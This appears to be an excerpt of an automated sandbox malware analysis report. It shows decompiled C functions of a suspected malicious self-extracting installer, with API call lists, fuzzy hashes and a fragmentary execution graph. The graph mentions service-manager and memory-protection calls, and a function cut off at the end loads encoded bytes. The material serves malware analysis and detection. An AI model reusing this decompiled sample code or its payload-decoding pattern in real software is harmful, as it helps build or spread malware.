                                • Part of subcall function 00A7468F: LockResource.KERNEL32(00000000,?,00A72D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746D3
                                • Part of subcall function 00A7468F: memcpy_s.MSVCRT ref: 00A746E5
                                • Part of subcall function 00A7468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 00A746EF
                              • LocalAlloc.KERNEL32(00000040,?,00000000,00000000,00000105,00000000,00A730B4), ref: 00A74189
                              • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000105,00000000,00A730B4), ref: 00A741E7
                                • Part of subcall function 00A744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                                • Part of subcall function 00A744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                              • String ID: <None>$FINISHMSG
                              • API String ID: 3507850446-3091758298
                              • Opcode ID: cde7563a2698a53bba93fb80315a9d392f6f4ab9fdee8780f5abbd6be04811ec
                              • Instruction ID: acfe5b3e88341b8bd1f40c3329cb0d12abf3ca2aac80cef94b9eafc3ea5dca17
                              • Opcode Fuzzy Hash: cde7563a2698a53bba93fb80315a9d392f6f4ab9fdee8780f5abbd6be04811ec
                              • Instruction Fuzzy Hash: 4001FFB23002243BF3242BA94C86F7B218EDBE9795F40C235B70EE21809BA8CC4241B5
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 93%
                              			E00A719E0(void* __ebx, void* __edi, struct HWND__* _a4, intOrPtr _a8, int _a12, int _a16) {
                              				signed int _v8;
                              				char _v520;
                              				void* __esi;
                              				signed int _t11;
                              				void* _t14;
                              				void* _t23;
                              				void* _t27;
                              				void* _t33;
                              				struct HWND__* _t34;
                              				signed int _t35;
                              
                              				_t33 = __edi;
                              				_t27 = __ebx;
                              				_t11 =  *0xa78004; // 0x74742267
                              				_v8 = _t11 ^ _t35;
                              				_t34 = _a4;
                              				_t14 = _a8 - 0x110;
                              				if(_t14 == 0) {
                              					_t32 = GetDesktopWindow();
                              					E00A743D0(_t34, _t15);
                              					_v520 = 0;
                              					LoadStringA( *0xa79a3c, _a16,  &_v520, 0x200);
                              					SetDlgItemTextA(_t34, 0x83f,  &_v520);
                              					MessageBeep(0xffffffff);
                              					goto L6;
                              				} else {
                              					if(_t14 != 1) {
                              						L4:
                              						_t23 = 0;
                              					} else {
                              						_t32 = _a12;
                              						if(_t32 - 0x83d > 1) {
                              							goto L4;
                              						} else {
                              							EndDialog(_t34, _t32);
                              							L6:
                              							_t23 = 1;
                              						}
                              					}
                              				}
                              				return E00A76CE0(_t23, _t27, _v8 ^ _t35, _t32, _t33, _t34);
                              			}

                              APIs
                              • EndDialog.USER32(?,?), ref: 00A71A18
                              • GetDesktopWindow.USER32 ref: 00A71A24
                              • LoadStringA.USER32(?,?,00000200), ref: 00A71A4F
                              • SetDlgItemTextA.USER32(?,0000083F,00000000), ref: 00A71A62
                              • MessageBeep.USER32(000000FF), ref: 00A71A6A
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                              • String ID:
                              • API String ID: 1273765764-0
                              • Opcode ID: 2136b17a9046c7fe0c2ef6e6326d80bf5fbf7c0decf3736d8920c5427f20e435
                              • Instruction ID: ebe727032d45b3ee8281da0f12413e344873da00d9e87121ad39770204f95253
                              • Opcode Fuzzy Hash: 2136b17a9046c7fe0c2ef6e6326d80bf5fbf7c0decf3736d8920c5427f20e435
                              • Instruction Fuzzy Hash: 7611A531501109AFDB10EFA8DE08AAE77F8EF99341F50C265F51A96190DA349E42CB95
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A77155() {
                              				void* _v8;
                              				struct _FILETIME _v16;
                              				signed int _v20;
                              				union _LARGE_INTEGER _v24;
                              				signed int _t23;
                              				signed int _t36;
                              				signed int _t37;
                              				signed int _t39;
                              
                              				_v16.dwLowDateTime = _v16.dwLowDateTime & 0x00000000;
                              				_v16.dwHighDateTime = _v16.dwHighDateTime & 0x00000000;
                              				_t23 =  *0xa78004; // 0x74742267
                              				if(_t23 == 0xbb40e64e || (0xffff0000 & _t23) == 0) {
                              					GetSystemTimeAsFileTime( &_v16);
                              					_v8 = _v16.dwHighDateTime ^ _v16.dwLowDateTime;
                              					_v8 = _v8 ^ GetCurrentProcessId();
                              					_v8 = _v8 ^ GetCurrentThreadId();
                              					_v8 = GetTickCount() ^ _v8 ^  &_v8;
                              					QueryPerformanceCounter( &_v24);
                              					_t36 = _v20 ^ _v24.LowPart ^ _v8;
                              					_t39 = _t36;
                              					if(_t36 == 0xbb40e64e || ( *0xa78004 & 0xffff0000) == 0) {
                              						_t36 = 0xbb40e64f;
                              						_t39 = 0xbb40e64f;
                              					}
                              					 *0xa78004 = _t39;
                              				}
                              				_t37 =  !_t36;
                              				 *0xa78008 = _t37;
                              				return _t37;
                              			}

                              APIs
                              • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00A77182
                              • GetCurrentProcessId.KERNEL32 ref: 00A77191
                              • GetCurrentThreadId.KERNEL32 ref: 00A7719A
                              • GetTickCount.KERNEL32 ref: 00A771A3
                              • QueryPerformanceCounter.KERNEL32(?), ref: 00A771B8
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                              • String ID:
                              • API String ID: 1445889803-0
                              • Opcode ID: ebd36182b2cf29527ea51d48ee92a28b59c35b1e26567e8625588839782142f4
                              • Instruction ID: 9f4a8589f7068139dbb6b9b18c392b9ca708fcab513f96fcabcc0a6e52b1d3fc
                              • Opcode Fuzzy Hash: ebd36182b2cf29527ea51d48ee92a28b59c35b1e26567e8625588839782142f4
                              • Instruction Fuzzy Hash: F4113D71D01208EBCB10DFF8DE4869EB7F4EF58311F918565D40AD7210DA349A468B41
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 88%
                              			E00A763C0(void* __ecx, void* __eflags, long _a4, intOrPtr _a12, void* _a16) {
                              				signed int _v8;
                              				char _v268;
                              				long _v272;
                              				void* _v276;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed int _t15;
                              				long _t28;
                              				struct _OVERLAPPED* _t37;
                              				void* _t39;
                              				signed int _t40;
                              
                              				_t15 =  *0xa78004; // 0x74742267
                              				_v8 = _t15 ^ _t40;
                              				_v272 = _v272 & 0x00000000;
                              				_push(__ecx);
                              				_v276 = _a16;
                              				_t37 = 1;
                              				E00A71781( &_v268, 0x104, __ecx, "C:\Users\jones\AppData\Local\Temp\IXP001.TMP\");
                              				E00A7658A( &_v268, 0x104, _a12);
                              				_t28 = 0;
                              				_t39 = CreateFileA( &_v268, 0x40000000, 0, 0, 2, 0x80, 0);
                              				if(_t39 != 0xffffffff) {
                              					_t28 = _a4;
                              					if(WriteFile(_t39, _v276, _t28,  &_v272, 0) == 0 || _t28 != _v272) {
                              						 *0xa79124 = 0x80070052;
                              						_t37 = 0;
                              					}
                              					CloseHandle(_t39);
                              				} else {
                              					 *0xa79124 = 0x80070052;
                              					_t37 = 0;
                              				}
                              				return E00A76CE0(_t37, _t28, _v8 ^ _t40, 0x104, _t37, _t39);
                              			}

                              APIs
                              • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A7642D
                              • WriteFile.KERNEL32(00000000,?,?,00000000,00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A7645B
                              • CloseHandle.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 00A7647A
                              Strings
                              • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00A763EB
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: File$CloseCreateHandleWrite
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                              • API String ID: 1065093856-3647970563
                              • Opcode ID: e673bc6200698e646f96931121d2e9692b4b21a298438430d59814d33577f368
                              • Instruction ID: 8255707115e3e285e5ad1b6e44cefa46e8347deee10c0cdf556567f1be0d22b9
                              • Opcode Fuzzy Hash: e673bc6200698e646f96931121d2e9692b4b21a298438430d59814d33577f368
                              • Instruction Fuzzy Hash: EB21D571A00218ABDB10DF65DC85FEB77B8EB94314F00C269F589A3180DBB05DC68F64
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A747E0(intOrPtr* __ecx) {
                              				intOrPtr _t6;
                              				intOrPtr _t9;
                              				void* _t11;
                              				void* _t19;
                              				intOrPtr* _t22;
                              				void _t24;
                              				struct HWND__* _t25;
                              				struct HWND__* _t26;
                              				void* _t27;
                              				intOrPtr* _t28;
                              				intOrPtr* _t33;
                              				void* _t34;
                              
                              				_t33 = __ecx;
                              				_t34 = LocalAlloc(0x40, 8);
                              				if(_t34 != 0) {
                              					_t22 = _t33;
                              					_t27 = _t22 + 1;
                              					do {
                              						_t6 =  *_t22;
                              						_t22 = _t22 + 1;
                              					} while (_t6 != 0);
                              					_t24 = LocalAlloc(0x40, _t22 - _t27 + 1);
                              					 *_t34 = _t24;
                              					if(_t24 != 0) {
                              						_t28 = _t33;
                              						_t19 = _t28 + 1;
                              						do {
                              							_t9 =  *_t28;
                              							_t28 = _t28 + 1;
                              						} while (_t9 != 0);
                              						E00A71680(_t24, _t28 - _t19 + 1, _t33);
                              						_t11 =  *0xa791e0; // 0x2e18408
                              						 *(_t34 + 4) = _t11;
                              						 *0xa791e0 = _t34;
                              						return 1;
                              					}
                              					_t25 =  *0xa78584; // 0x0
                              					E00A744B9(_t25, 0x4b5, _t8, _t8, 0x10, _t8);
                              					LocalFree(_t34);
                              					L2:
                              					return 0;
                              				}
                              				_t26 =  *0xa78584; // 0x0
                              				E00A744B9(_t26, 0x4b5, _t5, _t5, 0x10, _t5);
                              				goto L2;
                              			}

                              APIs
                              • LocalAlloc.KERNEL32(00000040,00000008,?,00000000,00A74E6F), ref: 00A747EA
                              • LocalAlloc.KERNEL32(00000040,?), ref: 00A74823
                              • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000), ref: 00A74847
                                • Part of subcall function 00A744B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00A74518
                                • Part of subcall function 00A744B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 00A74554
                              Strings
                              • C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 00A74851
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Local$Alloc$FreeLoadMessageString
                              • String ID: C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                              • API String ID: 359063898-3647970563
                              • Opcode ID: 6f60ac24a48fa1c822c7a1a871e01ff5de400a1f8e049689f13cbcc64ca0d85f
                              • Instruction ID: 26f79373e849968c6838737f108230544b492279c4775c42977ce30ca2e6e891
                              • Opcode Fuzzy Hash: 6f60ac24a48fa1c822c7a1a871e01ff5de400a1f8e049689f13cbcc64ca0d85f
                              • Instruction Fuzzy Hash: 6411C2756046416FE715DF649C58F773BAAEBC9300F04C629FA8A9B341DB358C478760
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A73680(void* __ecx) {
                              				void* _v8;
                              				struct tagMSG _v36;
                              				int _t8;
                              				struct HWND__* _t16;
                              
                              				_v8 = __ecx;
                              				_t16 = 0;
                              				while(1) {
                              					_t8 = MsgWaitForMultipleObjects(1,  &_v8, 0, 0xffffffff, 0x4ff);
                              					if(_t8 == 0) {
                              						break;
                              					}
                              					if(PeekMessageA( &_v36, 0, 0, 0, 1) == 0) {
                              						continue;
                              					} else {
                              						do {
                              							if(_v36.message != 0x12) {
                              								DispatchMessageA( &_v36);
                              							} else {
                              								_t16 = 1;
                              							}
                              							_t8 = PeekMessageA( &_v36, 0, 0, 0, 1);
                              						} while (_t8 != 0);
                              						if(_t16 == 0) {
                              							continue;
                              						}
                              					}
                              					break;
                              				}
                              				return _t8;
                              			}








                              APIs
                              • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00A7369F
                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A736B2
                              • DispatchMessageA.USER32(?), ref: 00A736CB
                              • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00A736DA
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Message$Peek$DispatchMultipleObjectsWait
                              • String ID:
                              • API String ID: 2776232527-0
                              • Opcode ID: ba57d2e27e22cf07de6d19407220b1e12f441ca6c41b79f7c564cd5f3ed16543
                              • Instruction ID: 6954256748eb17b6779212ffa5516ad41a86733c2073ea30c1d700bb07ab9cbe
                              • Opcode Fuzzy Hash: ba57d2e27e22cf07de6d19407220b1e12f441ca6c41b79f7c564cd5f3ed16543
                              • Instruction Fuzzy Hash: 1F01A7739002547BDF308BE65C48EEF767CEBC5F11F11821DF909E2180D560C681D660
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 77%
                              			E00A76517(void* __ecx, CHAR* __edx, struct HWND__* _a4, _Unknown_base(*)()* _a8, intOrPtr _a12, int _a16) {
                              				struct HRSRC__* _t6;
                              				void* _t21;
                              				struct HINSTANCE__* _t23;
                              				int _t24;
                              
                              				_t23 =  *0xa79a3c; // 0xa70000
                              				_t6 = FindResourceA(_t23, __edx, 5);
                              				if(_t6 == 0) {
                              					L6:
                              					E00A744B9(0, 0x4fb, 0, 0, 0x10, 0);
                              					_t24 = _a16;
                              				} else {
                              					_t21 = LoadResource(_t23, _t6);
                              					if(_t21 == 0) {
                              						goto L6;
                              					} else {
                              						if(_a12 != 0) {
                              							_push(_a12);
                              						} else {
                              							_push(0);
                              						}
                              						_t24 = DialogBoxIndirectParamA(_t23, _t21, _a4, _a8);
                              						FreeResource(_t21);
                              						if(_t24 == 0xffffffff) {
                              							goto L6;
                              						}
                              					}
                              				}
                              				return _t24;
                              			}








                              APIs
                              • FindResourceA.KERNEL32(00A70000,000007D6,00000005), ref: 00A7652A
                              • LoadResource.KERNEL32(00A70000,00000000,?,?,00A72EE8,00000000,00A719E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00A76538
                              • DialogBoxIndirectParamA.USER32(00A70000,00000000,00000547,00A719E0,00000000), ref: 00A76557
                              • FreeResource.KERNEL32(00000000,?,?,00A72EE8,00000000,00A719E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00A76560
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Resource$DialogFindFreeIndirectLoadParam
                              • String ID:
                              • API String ID: 1214682469-0
                              • Opcode ID: 2e07d5bf7ae4596793c8c53e9572466220a7a7318042510dc141e5bd5e0bd6a1
                              • Instruction ID: 02bd670323ec12661f8a13d7b7b0e7ba2bb54f94be8cbac611d92c03f46f9e33
                              • Opcode Fuzzy Hash: 2e07d5bf7ae4596793c8c53e9572466220a7a7318042510dc141e5bd5e0bd6a1
                              • Instruction Fuzzy Hash: 1A012672100A05BBDB109FA99C08EBB7B6CEBC9761F04C125FE0C93190D7718C52EAA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 72%
                              			E00A765E8(char* __ecx) {
                              				char _t3;
                              				char _t10;
                              				char* _t12;
                              				char* _t14;
                              				char* _t15;
                              				CHAR* _t16;
                              
                              				_t12 = __ecx;
                              				_t15 = __ecx;
                              				_t14 =  &(__ecx[1]);
                              				_t10 = 0;
                              				do {
                              					_t3 =  *_t12;
                              					_t12 =  &(_t12[1]);
                              				} while (_t3 != 0);
                              				_push(CharPrevA(__ecx, _t12 - _t14 + __ecx));
                              				while(1) {
                              					_t16 = CharPrevA(_t15, ??);
                              					if(_t16 <= _t15) {
                              						break;
                              					}
                              					if( *_t16 == 0x5c) {
                              						L7:
                              						if(_t16 == _t15 ||  *(CharPrevA(_t15, _t16)) == 0x3a) {
                              							_t16 = CharNextA(_t16);
                              						}
                              						 *_t16 = _t10;
                              						_t10 = 1;
                              					} else {
                              						_push(_t16);
                              						continue;
                              					}
                              					L11:
                              					return _t10;
                              				}
                              				if( *_t16 == 0x5c) {
                              					goto L7;
                              				}
                              				goto L11;
                              			}










                              APIs
                              • CharPrevA.USER32(?,00000000,00000000,00000001,00000000,00A72B33), ref: 00A76602
                              • CharPrevA.USER32(?,00000000), ref: 00A76612
                              • CharPrevA.USER32(?,00000000), ref: 00A76629
                              • CharNextA.USER32(00000000), ref: 00A76635
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: Char$Prev$Next
                              • String ID:
                              • API String ID: 3260447230-0
                              • Opcode ID: 8a5de88ee8c3442c3fefa1448c470d1f3ab83de311408ebcc42641b9b25c98ae
                              • Instruction ID: 83c50343cfcb0f02393b0bc3a31128bfc6d9fbfd815fd77441cf04d168f5b520
                              • Opcode Fuzzy Hash: 8a5de88ee8c3442c3fefa1448c470d1f3ab83de311408ebcc42641b9b25c98ae
                              • Instruction Fuzzy Hash: 36F028320089907EE7365B798C88EBBBF9CCFDB355BA9C2BFE49D82001D6150D478661
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E00A769B0() {
                              				intOrPtr* _t4;
                              				intOrPtr* _t5;
                              				void* _t6;
                              				intOrPtr _t11;
                              				intOrPtr _t12;
                              
                              				 *0xa781f8 = E00A76C70();
                              				__set_app_type(E00A76FBE(2));
                              				 *0xa788a4 =  *0xa788a4 | 0xffffffff;
                              				 *0xa788a8 =  *0xa788a8 | 0xffffffff;
                              				_t4 = __p__fmode();
                              				_t11 =  *0xa78528; // 0x0
                              				 *_t4 = _t11;
                              				_t5 = __p__commode();
                              				_t12 =  *0xa7851c; // 0x0
                              				 *_t5 = _t12;
                              				_t6 = E00A77000();
                              				if( *0xa78000 == 0) {
                              					__setusermatherr(E00A77000);
                              				}
                              				E00A771EF(_t6);
                              				return 0;
                              			}









                              APIs
                                • Part of subcall function 00A76FBE: GetModuleHandleW.KERNEL32(00000000), ref: 00A76FC5
                              • __set_app_type.MSVCRT ref: 00A769C2
                              • __p__fmode.MSVCRT ref: 00A769D8
                              • __p__commode.MSVCRT ref: 00A769E6
                              • __setusermatherr.MSVCRT ref: 00A76A07
                              Memory Dump Source
                              • Source File: 00000001.00000002.444523475.0000000000A71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00A70000, based on PE: true
                              • Associated: 00000001.00000002.444517050.0000000000A70000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444540149.0000000000A78000.00000004.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7A000.00000002.00000001.01000000.00000004.sdmp
                              • Associated: 00000001.00000002.444549142.0000000000A7C000.00000002.00000001.01000000.00000004.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a70000_bmKg.jbxd
                              Similarity
                              • API ID: HandleModule__p__commode__p__fmode__set_app_type__setusermatherr
                              • String ID:
                              • API String ID: 1632413811-0
                              • Opcode ID: a50f4aab4d4c193a9a0cc8645eb8f2b97bc829d13c4fb79a5a38b2f43ee8edf8
                              • Instruction ID: 8a1644c797307ac19a5456339200759869cc9683a0b989917404cd819fb422cd
                              • Opcode Fuzzy Hash: a50f4aab4d4c193a9a0cc8645eb8f2b97bc829d13c4fb79a5a38b2f43ee8edf8
                              • Instruction Fuzzy Hash: C1F0F8B05487019FD714EBB0AE0E6593B61FB54331B50C619E46E862F1CF3E85C3CA12
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Execution Graph

                              Execution Coverage:3.5%
                              Dynamic/Decrypted Code Coverage:31.7%
                              Signature Coverage:15.9%
                              Total number of Nodes:353
                              Total number of Limit Nodes:34
calls __decode_pointer 25883->25884 25884->25883 25886 40e9d6 25885->25886 25887 40e9fb 25885->25887 25886->25879 25889 40d606 LeaveCriticalSection 25886->25889 25892 40d606 LeaveCriticalSection 25887->25892 25889->25878 25890->25875 25891->25883 25892->25886 25455 22f9920 25456 22f996b OpenSCManagerW 25455->25456 25458 22f99b4 25456->25458 25459 22f0980 25460 22f0989 25459->25460 25462 22f4a25 25459->25462 25465 22f90d0 25462->25465 25467 22f90e3 25465->25467 25469 22f9180 25467->25469 25470 22f91c8 VirtualProtect 25469->25470 25472 22f4a47 25470->25472

                              Control-flow Graph for function 004019F0 (legend: Executed / Not Executed)
                              C-Code - Quality: 77%
                              			E004019F0(void* __edx, void* __eflags) {
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* __ebp;
                              				void* _t337;
                              				void* _t340;
                              				int _t341;
                              				CHAR* _t344;
                              				intOrPtr* _t349;
                              				int _t350;
                              				long _t352;
                              				signed int _t354;
                              				intOrPtr _t358;
                              				long _t359;
                              				CHAR* _t364;
                              				struct HINSTANCE__* _t365;
                              				CHAR* _t366;
                              				_Unknown_base(*)()* _t367;
                              				int _t368;
                              				int _t369;
                              				int _t370;
                              				intOrPtr* _t376;
                              				int _t378;
                              				intOrPtr _t379;
                              				intOrPtr* _t381;
                              				int _t383;
                              				intOrPtr* _t384;
                              				int _t385;
                              				int _t396;
                              				int _t399;
                              				int _t402;
                              				int _t405;
                              				intOrPtr* _t407;
                              				int _t413;
                              				int _t415;
                              				void* _t421;
                              				int _t422;
                              				int _t424;
                              				intOrPtr* _t428;
                              				intOrPtr _t429;
                              				intOrPtr* _t431;
                              				int _t432;
                              				int _t435;
                              				intOrPtr* _t437;
                              				int _t438;
                              				intOrPtr* _t439;
                              				int _t440;
                              				int _t442;
                              				signed int _t448;
                              				signed int _t451;
                              				signed int _t452;
                              				int _t469;
                              				int _t471;
                              				int _t482;
                              				signed int _t486;
                              				intOrPtr* _t488;
                              				intOrPtr* _t490;
                              				intOrPtr* _t492;
                              				intOrPtr _t493;
                              				void* _t494;
                              				struct HRSRC__* _t497;
                              				void* _t514;
                              				int _t519;
                              				intOrPtr* _t520;
                              				void* _t524;
                              				void* _t525;
                              				struct HINSTANCE__* _t526;
                              				intOrPtr _t527;
                              				void* _t531;
                              				void* _t535;
                              				struct HRSRC__* _t536;
                              				intOrPtr* _t537;
                              				intOrPtr* _t539;
                              				int _t542;
                              				int _t543;
                              				intOrPtr* _t547;
                              				intOrPtr* _t548;
                              				intOrPtr* _t549;
                              				intOrPtr* _t550;
                              				void* _t551;
                              				intOrPtr _t552;
                              				int _t555;
                              				void* _t556;
                              				void* _t557;
                              				void* _t558;
                              				void* _t559;
                              				void* _t560;
                              				void* _t561;
                              				void* _t562;
                              				intOrPtr* _t563;
                              				void* _t564;
                              				void* _t565;
                              				void* _t566;
                              				void* _t567;
                              
                              				_t567 = __eflags;
                              				_t494 = __edx;
                              				__imp__OleInitialize(0); // executed
                              				 *((char*)(_t556 + 0x18)) = 0xe0;
                              				 *((char*)(_t556 + 0x19)) = 0x3b;
                              				 *((char*)(_t556 + 0x1a)) = 0x8d;
                              				 *((char*)(_t556 + 0x1b)) = 0x2a;
                              				 *((char*)(_t556 + 0x1c)) = 0xa2;
                              				 *((char*)(_t556 + 0x1d)) = 0x2a;
                              				 *((char*)(_t556 + 0x1e)) = 0x2a;
                              				 *((char*)(_t556 + 0x1f)) = 0x41;
                              				 *((char*)(_t556 + 0x20)) = 0xd3;
                              				 *((char*)(_t556 + 0x21)) = 0x20;
                              				 *((char*)(_t556 + 0x22)) = 0x64;
                              				 *((char*)(_t556 + 0x23)) = 6;
                              				 *((char*)(_t556 + 0x24)) = 0x8a;
                              				 *((char*)(_t556 + 0x25)) = 0xf7;
                              				 *((char*)(_t556 + 0x26)) = 0x3d;
                              				 *((char*)(_t556 + 0x27)) = 0x9d;
                              				 *((char*)(_t556 + 0x28)) = 0xd9;
                              				 *((char*)(_t556 + 0x29)) = 0xee;
                              				 *((char*)(_t556 + 0x2a)) = 0x15;
                              				 *((char*)(_t556 + 0x2b)) = 0x68;
                              				 *((char*)(_t556 + 0x2c)) = 0xf4;
                              				 *((char*)(_t556 + 0x2d)) = 0x76;
                              				 *((char*)(_t556 + 0x2e)) = 0xb9;
                              				 *((char*)(_t556 + 0x2f)) = 0x34;
                              				 *((char*)(_t556 + 0x30)) = 0xbf;
                              				 *((char*)(_t556 + 0x31)) = 0x1e;
                              				 *((char*)(_t556 + 0x32)) = 0xe7;
                              				 *((char*)(_t556 + 0x33)) = 0x78;
                              				 *((char*)(_t556 + 0x34)) = 0x98;
                              				 *((char*)(_t556 + 0x35)) = 0xe9;
                              				 *((char*)(_t556 + 0x36)) = 0x6f;
                              				 *((char*)(_t556 + 0x37)) = 0xb4;
